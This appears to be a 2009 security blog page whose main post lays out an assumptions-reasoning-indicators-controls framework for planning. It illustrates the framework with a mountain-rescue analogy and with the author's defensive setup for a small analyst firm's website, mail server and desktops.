Then again, perhaps we’ll all have super-high-speed carrier-based networks on some 6G technology before phone malware is prevalent, and we’ll be back on carrier networks again for most of our connectivity. In which case, if it’s AT&T, the network won’t be reliable enough for any malware to spread anyway.
Posted at Thursday 12th November 2009 3:43 pm
(0) Comments •
How often have you heard the phrase, “Never assume” (insert the cheesy catch phrase that was funny in 6th grade here)?
For the record, it’s wrong.
When designing our security, disaster recovery, or whatever, the problem isn’t that we make assumptions, it’s that we make the wrong assumptions. To narrow it down even more, the problem is when we make false assumptions, and typically those assumptions skew towards the positive, leaving us unprepared for the negative. Actually, I’ll narrow this down even more… the one assumption to avoid is a single phrase: “That will never happen.”
There’s really no way to perform any kind of forward-looking planning without some basis for assumptions. The trick to avoiding problems is that these assumptions should generally skew to the negative, and must always be justified, rather than merely accepted. It’s important not to make all your decisions based on worst cases because that leads to excessive costs. Expose all the the assumptions helps you examine the corresponding risk tolerance.
For example, in mountain rescue we engaged in non-stop scenario planning, and had to make certain assumptions. We assumed that a well cared for rope under proper use would only break at its tested breaking strength (minus knots and other calculable factors). We didn’t assume said breaking strength was what was printed on the label by the manufacturer, but was our own internal breaking strength value, determined through testing. We would then build in a minimum of a 3:1 safety factor to account for unexpected dynamic strains/wear/whatever. In the field we were constantly calculating load levels in our heads, and would even occasionally break out a dynamometer to confirm. We also tested every single component in our rescue systems – including the litter we’d stick the patient into, just in case someone had to hang off the end of it.
Our team was very heavy with engineers, but that isn’t the case with other rescue teams. Most of them used a 10:1 safety factor, but didn’t perform the same kinds of testing or calculations we did. There’s nothing wrong with that… although it did give our team a little more flexibility.
I was recently explaining the assumptions I used to derive our internal corporate security, and realized that I’ve been using a structured assumptions framework that I haven’t ever put in writing (until now). Since all scenario planning is based on assumptions, and the trick is to pick the right assumptions, I formalized my approach in the shower the other night (an image that has likely scarred all of you for life). It consists of four components:
- Reasoning: The basis for the assumption.
- Indicators: Specific cues that indicate whether the assumption is accurate or if there’s a problem in that area.
- Controls: The security/recovery/safety controls to mitigate the issue.
Here’s how I put it in practice when developing our security:
Assumption: Securosis in general, and myself specifically, are a visible target.
Reasoning: We are extremely visible and vocal in the security community, and as such are not only a target of opportunity. We also have strong relationships within the vulnerability research community, where directed attacks to embarrass individuals are not uncommon. That said, we aren’t at the top of an attacker’s list – there is no financial incentive to attack us, nor does any of our work directly interfere with the income of cybercriminal organizations. While we deal with some non-public information, it isn’t particularly valuable in a financial context. Thus we are a target, but the motivation would be to embarrass us and disrupt our operations, not to generate income.
Indicators: A number of our industry friends have been targeted and successfully attacked. Last year one of my private conversations with one such victim was revealed as part of an attack. For this particular assumption, no further indicators are really needed.
Controls: This assumption doesn’t drive specific controls, but does reinforce a general need to invest heavily in security to protect against a directed attack by someone willing to take the time to compromise myself or the company. You’ll see how this impacts things with the other assumptions.
Assumption: While we are a target, we are not valuable enough to waste a serious zero-day exploit on.
Reasoning: A zero-day capable of compromising our infrastructure will be too financially valuable to waste on merely embarrassing a gaggle of analysts. This is true for our internal infrastructure, but not necessarily for our web site.
Indicators: If this assumption is wrong, it’s possible one of our outbound filtering layers will register unusual activity, or we will see odd activity from a server.
Controls: Outbound filtering is our top control here, and we’ve minimized our external surface area and compartmentalized things internally. The zero-day would probably have to target our individual desktops, or our mail server, since we don’t really have much else. Our web site is on a less common platform, and I’ll talk more about that in a second. There are other possible controls we could put in place (from DLP to HIPS), but unless we have an indication someone would burn a valuable exploit on us, they aren’t worth the cost.
Assumption: Our website will be hacked.
Reasoning: We do not have the resources to perform full code analysis and lockdown on the third party platform we built our site on. Our site is remotely co-hosted, which also opens up potential points of attack. It is the weakest link in our infrastructure, and the easiest point to attack short of developing some new zero-day against our mail server or desktops.
Indicators: Unusual activity within the site, or new administrative user accounts. We periodically review the back-end management infrastructure for indicators of an ongoing compromise, including both the file system and the content management system. For example, if HTML rendering in comments was suddenly turned on, that would be an indicator.
Controls: We deliberately chose a service provider and platform with better than average security records, and security controls not usually available for a co-hosted site. We’ve disabled any HTML rendering in comments/forum posts, and promote use of NoScript when visiting our site to reduce user exposure when it’s compromised. On our side, we mandate single-site passwords for all the staff, which are not reused anywhere else. The site is hosted separately from our other infrastructure. I encourage everyone to use a single site browser that is locked down to only render content from our site (to avoid XSS/CSRF). I use two different layers to ensure I can only access the site, and nothing but the site, from my dedicated browser. Thus our own site shouldn’t be able to be used to compromise any other part of our infrastructure when someone finally pops it. Also, right now we don’t store sensitive information about any visitors on the site (no PII). When we do start offering for-pay products, we will use external credit card processing, pay for ongoing penetration testing, and remind our users to never reuse their site password anyplace else. We have a multi-level backup scheme to minimize lost data when the site is finally hacked.
Assumption: Our mail server is the most valuable target for an attacker.
Reasoning: Assuming our attacker is out to steal proprietary information or just embarrass us, our mail server is the best target (except for maybe my personal desktop). That’s where our sensitive client information is, and we pretty much give everything else away for free.
Indicators: Either a rise in attack activity on our mail server, or new outbound connections/accounts.
Controls: We have multiple layers of security on the mail server. It’s on an isolated network with nothing else on that network segment to compromise. This is the one area I don’t want to discuss in detail, but we have at least two filtering layers to get to the server (more than just a firewall), and outbound connection restrictions with a serious deny-all policy. Our mail server is locked up in my house (no remote admins, no other sites on the server that could be compromised to get to us), but not connected to my home network. The server itself is locked down pretty tight – we don’t even allow AV/anti-spam on the server since that could be a vector for attack (in other words, we minimize message processing). There’s even more, but despite what they say a little obscurity is sometimes good for security. If someone can get this server, they’ve fracking earned it.
This is already longer than I planned, but you can see the process. I’ve done the same thing for my day to day system and laptop, with a set of corresponding controls. Despite all this I’ll probably be hacked someday, but it will take a hack of a lot of time and effort since I always assume I’m under attack, and take precautions far above normal best practices. My goal is to make the effort to get to me high enough that to succeed, someone will have to give up far more lucrative financial opportunities. Even bad guys need to feed their families.
Assumptions are good… as long as you understand the reasoning, define indicators to track if they are right or wrong over time, and use them to develop corresponding controls.
Posted at Thursday 12th November 2009 9:17 am
(6) Comments •